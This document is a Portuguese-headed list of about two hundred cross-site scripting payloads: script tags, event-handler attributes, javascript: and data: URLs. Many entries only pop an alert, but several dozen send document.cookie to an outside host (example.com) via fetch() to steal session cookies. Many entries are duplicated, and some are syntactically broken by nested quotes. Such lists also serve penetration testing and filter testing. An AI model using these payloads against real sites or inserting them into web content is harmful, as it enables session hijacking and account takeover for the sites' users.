## Payloads de XSS
<script>alert('XSS')</script>

<img src="x" onerror="alert('XSS')">

<a href="javascript:alert('XSS')">Click me</a>

<svg/onload=alert('XSS')>

<iframe src="javascript:alert('XSS')"></iframe>

<body onload="alert('XSS')">

<input onfocus="alert('XSS')">

<div onmouseover="alert('XSS')">Hover me</div>

<form><button formaction="javascript:alert('XSS')">Submit</button></form>

<details open ontoggle="alert('XSS')"><summary>Click me</summary></details>

<video src="x" onerror="alert('XSS')">

<source src="javascript:alert('XSS')">

<marquee onstart="alert('XSS')">Scrolling text</marquee>

<object data="javascript:alert('XSS')"></object>

<embed src="javascript:alert('XSS')">

<link href="javascript:alert('XSS')" rel="stylesheet">

<style>@import 'javascript:alert('XSS')';</style>

<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">

<script src="javascript:alert('XSS')"></script>

<base href="javascript:alert('XSS')">

<input type="text" value="x" onclick="alert('XSS')">

<textarea onfocus="alert('XSS')"></textarea>

<form action="javascript:alert('XSS')"><input type="submit"></form>

<select onchange="alert('XSS')"><option>Option</option></select>

<button onclick="alert('XSS')">Click me</button>

<a href="data:text/html,<script>alert('XSS')</script>">Link</a>

<a href="javascript:void(alert('XSS'))">Link</a>

<input type="image" src="x" onerror="alert('XSS')">

<script>alert(String.fromCharCode(88,83,83))</script>

<script>fetch('https://example.com?xss=' + document.cookie)</script>

<script>alert(document.domain)</script>

<script>document.body.innerHTML = '<img src="x" onerror="alert('XSS')">'</script>

<script>document.write('<img src="x" onerror="alert('XSS')">')</script>

<script>eval('alert(\'XSS\')')</script>

<script>setTimeout('alert(\'XSS\')', 1000)</script>

<script>document.location='javascript:alert(1)'</script>

<script>location.href='javascript:alert(1)'</script>

<script>window.onload=function(){alert('XSS')}</script>

<svg/onload=eval('alert("XSS")')>

<svg/onload=eval('alert("XSS")')>

<input type="text" value="test" onfocus="alert('XSS')">

<textarea onblur="alert('XSS')"></textarea>

<button onclick="document.getElementById('myDiv').innerHTML='<img src=x onerror=alert(1)>'">Click</button>

<iframe src="data:text/html,<script>alert(1)</script>"></iframe>

<object data="javascript:alert('XSS')"></object>

<audio src="javascript:alert('XSS')"></audio>

<embed type="text/html" src="javascript:alert('XSS')"></embed>

<iframe src="javascript:alert('XSS')"></iframe>

<object data="javascript:alert('XSS')"></object>

<svg/onload="eval('alert(1)')">

<a href="javascript:eval('alert(1)')">Click me</a>

<a href="javascript:alert(1)">Click me</a>

<a href="javascript:alert(document.cookie)">Click me</a>

<a href="javascript:fetch('https://example.com?cookie=' + document.cookie)">Click me</a>

<a href="javascript:alert('XSS')">Click me</a>

<img src="x" onerror="fetch('https://example.com?cookie=' + document.cookie)">

<script>fetch('https://example.com?cookie=' + document.cookie)</script>

<script>document.write('<img src=x onerror=alert(1)>')</script>

<script>document.body.innerHTML='<img src=x onerror=alert(1)>'</script>

<iframe src="data:text/html,<script>alert(1)</script>"></iframe>

<form action="javascript:alert('XSS')"><input type="submit"></form>

<a href="data:text/html,<script>alert('XSS')</script>">Click me</a>

<script>alert('<img src=x onerror=alert(1)>')</script>

<script>eval('alert(1)')</script>

<script>location.href='javascript:alert(1)'</script>

<script>fetch('https://example.com?xss=' + document.cookie)</script>

<svg/onload="alert(document.cookie)">

<script>alert(document.domain)</script>

<script>setTimeout('alert(document.domain)', 1000)</script>

<script>setTimeout(function(){ alert(document.domain) }, 1000)</script>

<a href="javascript:eval('alert(1)')">Click me</a>

<input type="text" onfocus="alert('XSS')">

<input type="text" onclick="alert('XSS')">

<textarea onblur="alert('XSS')"></textarea>

<textarea onfocus="alert('XSS')"></textarea>

<button onclick="eval('alert(1)')">Click me</button>

<iframe src="javascript:alert(1)"></iframe>

<audio src="javascript:alert(1)"></audio>

<style>@import 'javascript:alert(1)';</style>

<link href="javascript:alert(1)" rel="stylesheet">

<script>alert('XSS');</script>

<svg onload="alert('XSS')">

<script>eval('alert("XSS")')</script>

<img src="x" onerror="fetch('https://example.com?cookie=' + document.cookie)">

<iframe src="data:text/html,<script>alert('XSS')</script>"></iframe>

<script>fetch('https://example.com?cookie=' + document.cookie)</script>

<script>document.write('<img src=x onerror=alert(1)>')</script>

<a href="javascript:fetch('https://example.com?cookie=' + document.cookie)">Click me</a>

<a href="data:text/html,<script>alert('XSS')</script>">Click me</a>

<script>alert(String.fromCharCode(88,83,83))</script>

<script>document.body.innerHTML = '<img src=x onerror=alert(1)>'</script>

<a href="javascript:fetch('https://example.com?cookie=' + document.cookie)">Click me</a>

<input type="text" onclick="eval('alert(1)')">

<script>eval('alert(1)')</script>

<textarea onfocus="eval('alert(1)')"></textarea>

<input type="button" onclick="fetch('https://example.com?cookie=' + document.cookie)">

<img src="x" onerror="fetch('https://example.com?cookie=' + document.cookie)">

<iframe src="javascript:alert(1)"></iframe>

<script>fetch('https://example.com?xss=' + document.cookie)</script>

<script>document.write('<img src=x onerror=alert(1)>')</script>

<a href="javascript:alert('XSS')">Click me</a>

<input type="text" value="x" onfocus="alert('XSS')">

<textarea onblur="alert('XSS')"></textarea>

<button onclick="alert('XSS')">Click me</button>

<a href="data:text/html,<script>alert('XSS')</script>">Link</a>

<iframe src="data:text/html,<script>alert('XSS')</script>"></iframe>

<object data="javascript:alert('XSS')"></object>

<embed src="javascript:alert('XSS')">

<style>@import 'javascript:alert('XSS')';</style>

<link href="javascript:alert('XSS')" rel="stylesheet">

<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">

<svg/onload="eval('alert(1)')">

<object data="javascript:alert('XSS')"></object>

<audio src="javascript:alert('XSS')"></audio>

<script>alert('<img src=x onerror=alert(1)>')</script>

<iframe src="javascript:alert('XSS')"></iframe>

<a href="javascript:alert(document.cookie)">Click me</a>

<input type="button" onclick="eval('alert(1)')">

<script>eval('alert("XSS")')</script>

<img src="x" onerror="eval('alert(1)')">

<svg onload="alert(1)">

<input type="text" value="x" onfocus="eval('alert(1)')">

<a href="javascript:fetch('https://example.com?cookie=' + document.cookie)">Link</a>

<a href="data:text/html,<script>alert(1)</script>">Link</a>

<script>fetch('https://example.com?cookie=' + document.cookie)</script>

<script>document.write('<img src=x onerror=alert(1)>')</script>

<input type="text" value="x" onclick="alert('XSS')">

<textarea onfocus="alert('XSS')"></textarea>

<button onclick="eval('alert(1)')">Click me</button>

<a href="javascript:alert(1)">Click me</a>

<iframe src="javascript:eval('alert(1)')"></iframe>

<object data="javascript:eval('alert(1)')"></object>

<audio src="javascript:eval('alert(1)')"></audio>

<script>alert('XSS');</script>

<img src="x" onerror="document.write('<img src=x onerror=alert(1)>')">

<script>fetch('https://example.com?cookie=' + document.cookie)</script>

<a href="javascript:eval('alert(1)')">Click me</a>

<textarea onblur="alert('XSS')"></textarea>

<form action="javascript:alert('XSS')"><input type="submit"></form>

<input type="button" onclick="fetch('https://example.com?cookie=' + document.cookie)">

<a href="data:text/html,<script>alert('XSS')</script>">Click me</a>

<input type="text" value="x" onfocus="fetch('https://example.com?cookie=' + document.cookie)">

<a href="javascript:alert(document.cookie)">Click me</a>

<img src="x" onerror="fetch('https://example.com?cookie=' + document.cookie)">

<script>eval('alert("XSS")')</script>

<iframe src="javascript:alert('XSS')"></iframe>

<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">

<object data="javascript:alert('XSS')"></object>

<script>document.write('<img src=x onerror=alert(1)>')</script>

<script>fetch('https://example.com?cookie=' + document.cookie)</script>

<img src="x" onerror="fetch('https://example.com?cookie=' + document.cookie)">

<a href="javascript:alert('XSS')">Click me</a>

<button onclick="alert('XSS')">Click me</button>

<form action="javascript:alert('XSS')"><input type="submit"></form>

<iframe src="data:text/html,<script>alert('XSS')</script>"></iframe>

<textarea onfocus="eval('alert(1)')"></textarea>

<input type="text" onclick="eval('alert(1)')">

<a href="data:text/html,<script>alert(1)</script>">Click me</a>

<input type="text" value="x" onclick="fetch('https://example.com?cookie=' + document.cookie)">

<iframe src="data:text/html,<script>alert(1)</script>"></iframe>

<img src="x" onerror="alert('XSS')">

<a href="javascript:alert(1)">Click me</a>

<script>eval('alert(1)')</script>

<input type="button" onclick="alert('XSS')">

<textarea onblur="eval('alert(1)')"></textarea>

<script>document.write('<img src=x onerror=alert(1)>')</script>

<button onclick="fetch('https://example.com?cookie=' + document.cookie)">Click me</button>

<svg onload="alert(1)">

<script>alert(document.domain)</script>

<iframe src="javascript:eval('alert(1)')"></iframe>

<object data="javascript:eval('alert(1)')"></object>

<audio src="javascript:eval('alert(1)')"></audio>

<meta http-equiv="refresh" content="0;url=javascript:eval('alert(1)')">

<input type="text" onclick="fetch('https://example.com?cookie=' + document.cookie)">

<script>alert('XSS')</script>

<button onclick="eval('alert(1)')">Click me</button>

<textarea onfocus="alert('XSS')"></textarea>

<script>alert(document.cookie)</script>

<iframe src="javascript:fetch('https://example.com?cookie=' + document.cookie)"></iframe>

<img src="x" onerror="fetch('https://example.com?cookie=' + document.cookie)">

<svg/onload="fetch('https://example.com?cookie=' + document.cookie)">

<form action="javascript:eval('alert(1)')"><input type="submit"></form>

<input type="text" onfocus="fetch('https://example.com?cookie=' + document.cookie)">

<button onclick="fetch('https://example.com?cookie=' + document.cookie)">Click me</button>

<a href="javascript:fetch('https://example.com?cookie=' + document.cookie)">Click me</a>

<textarea onfocus="fetch('https://example.com?cookie=' + document.cookie)"></textarea>

<img src="x" onerror="eval('alert(1)')">

<svg/onload="fetch('https://example.com?cookie=' + document.cookie)">

<meta http-equiv="refresh" content="0;url=javascript:eval('alert(1)')">

<iframe src="data:text/html,<script>alert(1)</script>"></iframe>

<object data="data:text/html,<script>alert(1)</script>"></object>

<script>document.body.innerHTML = '<img src=x onerror=eval('alert(1)')>'</script>

<a href="data:text/html,<script>alert(1)</script>">Click me</a>

<input type="text" onclick="fetch('https://example.com?cookie=' + document.cookie)">

<script>eval('fetch('https://example.com?cookie=' + document.cookie)')</script>

<button onclick="eval('fetch('https://example.com?cookie=' + document.cookie)')">Click me</button>

<a href="data:text/html,<script>alert(1)</script>">Click me</a>

<iframe src="data:text/html,<script>alert(1)</script>"></iframe>

<input type="text" onclick="alert('XSS')">

<script>alert('XSS')</script>
